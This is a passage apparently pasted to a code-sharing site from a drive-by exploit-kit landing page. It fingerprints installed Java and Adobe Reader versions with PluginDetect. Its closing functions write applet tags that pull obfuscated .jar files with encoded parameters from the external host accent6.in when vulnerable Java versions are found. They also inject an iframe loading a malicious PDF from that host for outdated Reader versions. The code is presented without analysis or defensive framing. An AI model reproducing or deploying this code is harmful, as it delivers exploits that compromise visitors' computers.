  911.                     g, a = c.queryWithoutApplets;
  912.                 if (!a.value) {
  913.                     a.value = [null, null];
  914.                     if (!f.isIE && window.java) {
  915.                         if (f.OS == 2 && f.isOpera && f.verOpera < 9.2 && f.verOpera >= 9) {} else {
  916.                             if (f.isGecko && f.compareNums(f.verGecko, "1,9,0,0") < 0 && f.compareNums(f.verGecko, "1,8,0,0") >= 0) {} else {
  917.                                 if (f.isGecko) {
  918.                                     var i, b, h = document;
  919.                                     if (h.createElement && h.createEvent) {
  920.                                         try {
  921.                                             i = h.createElement("div"), b = h.createEvent("HTMLEvents");
  922.                                             b.initEvent("change", false, false);
  923.                                             i.addEventListener("change", f.handler(c.queryWithoutApplets00, f, a), false);
  924.                                             i.dispatchEvent(b)
  925.                                         } catch (g) {}
  926.                                     }
  927.                                 } else {
  928.                                     c.queryWithoutApplets00(f, a)
  929.                                 }
  930.                             }
  931.                         }
  932.                     }
  933.                 }
  934.                 return a.value
  935.             },
  936.             applet: {
  937.                 results: [
  938.                     [null, null],
  939.                     [null, null],
  940.                     [null, null]
  941.                 ],
  942.                 HTML: [0, 0, 0],
  943.                 active: [0, 0, 0],
  944.                 allowed: [2, 2, 2],
  945.                 DummyObjTagHTML: 0,
  946.                 DummySpanTagHTML: 0,
  947.                 getResult: function () {
  948.                     var c = this.results,
  949.                         a, b;
  950.                     for (a = 0; a < c.length; a++) {
  951.                         b = c[a];
  952.                         if (b[0]) {
  953.                             break
  954.                         }
  955.                     }
  956.                     return [].concat(b)
  957.                 },
  958.                 canTry: function (d) {
  959.                     var b = this,
  960.                         c = b.$,
  961.                         a = b.parentNode;
  962.                     if (b.allowed[d] == 3) {
  963.                         return true
  964.                     }
  965.                     if (!a.version0 || !a.Enabled || (c.isIE && !c.ActiveXEnabled)) {
  966.                         if (b.allowed[d] == 2) {
  967.                             return true
  968.                         }
  969.                         if (b.allowed[d] == 1 && !b.getResult()[0]) {
  970.                             return true
  971.                         }
  972.                     }
  973.                     return false
  974.                 },
  975.                 canTryAny: function () {
  976.                     var b = this,
  977.                         a;
  978.                     for (a = 0; a < b.allowed.length; a++) {
  979.                         if (b.canTry(a)) {
  980.                             return true
  981.                         }
  982.                     }
  983.                     return false
  984.                 },
  985.                 canUseAppletTag: function () {
  986.                     var b = this,
  987.                         c = b.$,
  988.                         a = b.parentNode;
  989.                     return (!c.isIE || a.Enabled)
  990.                 },
  991.                 canUseObjectTag: function () {
  992.                     var a = this,
  993.                         b = a.$;
  994.                     return (!b.isIE || b.ActiveXEnabled)
  995.                 },
  996.                 queryThis: function (h) {
  997.                     var g, c = this,
  998.                         b = c.parentNode,
  999.                         f = b.$,
  1000.                         a = vendor = null,
  1001.                         d = f.getDOMobj(c.HTML[h], true);
  1002.                     if (d) {
  1003.                         try {
  1004.                             a = d.getVersion() + " ";
  1005.                             vendor = d.getVendor() + " ";
  1006.                             d.statusbar(f.winLoaded ? " " : " ")
  1007.                         } catch (g) {}
  1008.                         if (f.isStrNum(a)) {
  1009.                             c.results[h] = [a, vendor]
  1010.                         }
  1011.                         try {
  1012.                             if (f.isIE && a && d.readyState != 4) {
  1013.                                 f.garbage = true;
  1014.                                 d.parentNode.removeChild(d)
  1015.                             }
  1016.                         } catch (g) {}
  1017.                     }
  1018.                 },
  1019.                 insertHTMLQueryAll: function (e) {
  1020.                     var g = this,
  1021.                         n = g.parentNode,
  1022.                         d = n.$,
  1023.                         o = g.results,
  1024.                         q = g.HTML,
  1025.                         h = "&nbsp;&nbsp;&nbsp;&nbsp;",
  1026.                         u = "A.class";
  1027.                     if (!d.isString(e) || !(/\.jar\s*$/).test(e) || (/\\/).test(e)) {
  1028.                         return [null, null]
  1029.                     }
  1030.                     if (n.OTF < 1) {
  1031.                         n.OTF = 1
  1032.                     }
  1033.                     if (n.jreDisabled()) {
  1034.                         return [null, null]
  1035.                     }
  1036.                     if (n.OTF < 2) {
  1037.                         n.OTF = 2
  1038.                     }
  1039.                     var c = e,
  1040.                         t = "",
  1041.                         m;
  1042.                     if ((/[\/]/).test(e)) {
  1043.                         m = e.split("/");
  1044.                         c = m[m.length - 1];
  1045.                         m[m.length - 1] = "";
  1046.                         t = m.join("/")
  1047.                     }
  1048.                     var j = ["archive", c, "code", u],
  1049.                         l = ["mayscript", "true"],
  1050.                         r = ["scriptable", "true"].concat(l),
  1051.                         f = !d.isIE && n.mimeObj && n.mimeObj.type ? n.mimeObj.type : n.mimeType[0];
  1052.                     if (!q[0] && g.canUseObjectTag() && g.canTry(0)) {
  1053.                         q[0] = d.isIE ? d.insertHTML("object", ["type", f].concat(j), ["codebase", t].concat(j).concat(r), h, n) : d.insertHTML("object", ["type", f, "archive", c, "classid", "java:" + u], ["codebase", t, "archive", c].concat(r), h, n);
  1054.                         o[0] = [0, 0];
  1055.                         g.queryThis(0)
  1056.                     }
  1057.                     if (!q[1] && g.canUseAppletTag() && g.canTry(1)) {
  1058.                         q[1] = d.isIE ? d.insertHTML("applet", ["alt", h].concat(l).concat(j), ["codebase", t].concat(l), h, n) : d.insertHTML("applet", ["codebase", t, "alt", h].concat(l).concat(j), [].concat(l), h, n);
  1059.                         o[1] = [0, 0];
  1060.                         g.queryThis(1)
  1061.                     }
  1062.                     if (!q[2] && g.canUseObjectTag() && g.canTry(2)) {
  1063.                         q[2] = d.isIE ? d.insertHTML("object", ["classid", n.classID], ["codebase", t].concat(j).concat(r), h, n) : d.insertHTML();
  1064.                         o[2] = [0, 0];
  1065.                         g.queryThis(2)
  1066.                     }
  1067.                     if (!g.DummyObjTagHTML && g.canUseObjectTag()) {
  1068.                         g.DummyObjTagHTML = d.insertHTML("object", [], [], h)
  1069.                     }
  1070.                     if (!g.DummySpanTagHTML) {
  1071.                         g.DummySpanTagHTML = d.insertHTML("", [], [], h)
  1072.                     };
  1073.                     var k, a = 0;
  1074.                     for (k = 0; k < o.length; k++) {
  1075.                         if (q[k] || g.canTry(k)) {
  1076.                             a++
  1077.                         } else {
  1078.                             break
  1079.                         }
  1080.                     }
  1081.                     if (a == o.length) {
  1082.                         n.getVersionDone = n.forceVerifyTag.length > 0 ? 0 : 1
  1083.                     }
  1084.                     return g.getResult()
  1085.                 }
  1086.             },
  1087.             append: function (e, d) {
  1088.                 for (var c = 0; c < d.length; c++) {
  1089.                     e.push(d[c])
  1090.                 }
  1091.             },
  1092.             JavaFix: function () {}
  1093.         },
  1094.         adobereader: {
  1095.             mimeType: "application/pdf",
  1096.             navPluginObj: null,
  1097.             progID: ["AcroPDF.PDF", "PDF.PdfCtrl"],
  1098.             classID: "clsid:CA8A9780-280D-11CF-A24D-444553540000",
  1099.             INSTALLED: {},
  1100.             pluginHasMimeType: function (d, c, f) {
  1101.                 var b = this,
  1102.                     e = b.$,
  1103.                     a;
  1104.                 for (a in d) {
  1105.                     if (d[a] && d[a].type && d[a].type == c) {
  1106.                         return 1
  1107.                     }
  1108.                 }
  1109.                 if (e.getMimeEnabledPlugin(c, f)) {
  1110.                     return 1
  1111.                 }
  1112.                 return 0
  1113.             },
  1114.             getVersion: function (i, j) {
  1115.                 var f = this,
  1116.                     c = f.$,
  1117.                     h, d, k, m = p = null,
  1118.                     g = null,
  1119.                     l = null,
  1120.                     a, b;
  1121.                 j = (c.isString(j) && j.length) ? j.replace(/\s/, "").toLowerCase() : f.mimeType;
  1122.                 if (c.isDefined(f.INSTALLED[j])) {
  1123.                     f.installed = f.INSTALLED[j];
  1124.                     return
  1125.                 }
  1126.                 if (!c.isIE) {
  1127.                     a = "Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in";
  1128.                     if (f.getVersionDone !== 0) {
  1129.                         f.getVersionDone = 0;
  1130.                         p = c.getMimeEnabledPlugin(f.mimeType, a);
  1131.                         if (!p && c.hasMimeType(f.mimeType)) {
  1132.                             p = c.findNavPlugin(a, 0)
  1133.                         }
  1134.                         if (p) {
  1135.                             f.navPluginObj = p;
  1136.                             g = c.getNum(p.description) || c.getNum(p.name);
  1137.                             g = c.getPluginFileVersion(p, g);
  1138.                             if (!g && c.OS == 1) {
  1139.                                 if (f.pluginHasMimeType(p, "application/vnd.adobe.pdfxml", a)) {
  1140.                                     g = "9"
  1141.                                 } else {
  1142.                                     if (f.pluginHasMimeType(p, "application/vnd.adobe.x-mars", a)) {
  1143.                                         g = "8"
  1144.                                     }
  1145.                                 }
  1146.                             }
  1147.                         }
  1148.                     } else {
  1149.                         g = f.version
  1150.                     }
  1151.                     m = c.getMimeEnabledPlugin(j, a);
  1152.                     f.installed = m && g ? 1 : (m ? 0 : (f.navPluginObj ? -0.2 : -1))
  1153.                 } else {
  1154.                     p = c.getAXO(f.progID[0]) || c.getAXO(f.progID[1]);
  1155.                     b = /=\s*([\d\.]+)/g;
  1156.                     try {
  1157.                         d = (p || c.getDOMobj(c.insertHTML("object", ["classid", f.classID], ["src", ""], "", f))).GetVersions();
  1158.                         for (k = 0; k < 5; k++) {
  1159.                             if (b.test(d) && (!g || RegExp.$1 > g)) {
  1160.                                 g = RegExp.$1
  1161.                             }
  1162.                         }
  1163.                     } catch (h) {}
  1164.                     f.installed = g ? 1 : (p ? 0 : -1)
  1165.                 }
  1166.                 if (!f.version) {
  1167.                     f.version = c.formatNum(g)
  1168.                 }
  1169.                 f.INSTALLED[j] = f.installed
  1170.             }
  1171.         },
  1172.         zz: 0
  1173.     };
  1174.     PluginDetect.initScript();
  1175.     PluginDetect.getVersion(".");
  1176.     jver = PluginDetect.getVersion("Java", javafile);
  1177.     pdfver = PluginDetect.getVersion("AdobeReader");
  1178. } catch (e) {}
  1179. if (typeof jver == 'string') {
  1180.     jver = jver.split('.')
  1181. } else {
  1182.     jver = [0, 0, 0, 0]
  1183. }
  1184. if (typeof pdfver == 'string') {
  1185.     pdfver = pdfver.split('.');
  1186.     var pdfv = parseInt(pdfver[0] + pdfver[1] + pdfver[2])
  1187. } else {
  1188.     pdfver = [0, 0, 0, 0]
  1189. }
  1190. function ns2() {
  1191.     if ((jver[1] == 5 && jver[3] <= 23) || (jver[1] == 6 && jver[3] <= 18)) {
  1192.         document.write(' < appletcode = "vJOvqrAXC.xWDDl.class"archive = "http://accent6.in//images/7b8247ba0f82b0592a3b1ce58d98347d.jar" >< paramname = "uoo1"
  1193.    value = "QWWx%__jiihXWpBOX_dhLmhL.xLOmO8hfhdBxQx/5n59joYjq55ntvEEuujjpYtiq9qEuhEj#E"
  1194.     ></ applet > ');
  1195.     }
  1196.     ns3();
  1197. }
  1198. function ns1() {
  1199.     if (jver[1] == 6 && jver[3] <= 27) {
  1200.         document.write('
  1201.     < appletcode = "Tli.NRJKSumt.class"archive =
  1202.    "http://accent6.in//images/r/7b8247ba0f82b0592a3b1ce58d98347d.jar" >< paramname =
  1203.    "ur0l0"value =
  1204.    "QWWx%__jiihXWpBOX_dhLmhL.xLOmO8hfhdBxQx/5n59joYjq55ntvEEuujjpYtiq9qEuhEj#v" ></
  1205.    applet > ');
  1206.     }
  1207.     ns2();
  1208. }
  1209.  
  1210. function ns3() {
  1211.     if ((pdfver[0] == 8) || (pdfver[0] == 9 && pdfver[1] <= 3)) {
  1212.         var s1 = document.createElement("iframe");
  1213.         s1.setAttribute("src", "http://accent6.in//images/7f78a95a077fd32244aa65dc08024e2a.pdf");
  1214.         s1.setAttribute("width", "169");
  1215.         s1.setAttribute("height", "436");
  1216.         s1.setAttribute("frameborder", "1");
  1217.         document.body.appendChild(s1);
  1218.     }
  1219. }
  1220. ns1();
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement